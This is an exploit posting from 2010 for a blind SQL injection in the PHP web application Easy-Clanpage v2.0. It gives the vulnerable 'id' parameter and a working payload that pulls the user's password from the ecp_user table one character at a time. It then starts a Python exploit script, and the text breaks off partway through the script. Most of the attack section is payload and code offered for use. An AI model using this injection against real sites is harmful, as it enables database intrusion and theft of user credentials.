1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 +Name : Easy−Clanpage <= v2.0 Blind SQL Injection Exploit
3 +Autor : Easy Laster
4 +Date : 24.03.2010
5 +Script : Easy−Clanpage v2.0
6 +Download : http://www.easy−clanpage.de/?section=downloads&action=viewdl&id=12
7 +Demo : http://capu87.ca.funpic.de/
8 +Price : for free
9 +Language : PHP
10 +Discovered by Easy Laster
11 +Security Group 4004−Security−Project
12 +Greetz to Team−Internet ,Underground Agents
13 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
14 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge,
15 N00bor,Ic3Drag0n,novaca!ne.
16
17 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
18
19 ___ ___ ___ ___ _ _ _____ _ _
20 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
21 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _|
22 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
23 |___| |___|
24
25
26 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
27 +Vulnerability : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=
28
29 #BLind SQL Injection
30 +Exploitable : http://localhost/ecp_version2/?section=user&action=details&func=stats&id=
31 1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1
32 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
33 #Blind SQL Injection Exploit
34
35 #!/usr/bin/env python
36 #−*− coding:utf−8 −*−
37 import sys, urllib2, getopt
38
39 def out(str):
40 sys.stdout.write(str)
41 sys.stdout.flush()
42
43 class Exploit:
44 charset = "0123456789abcdefABCD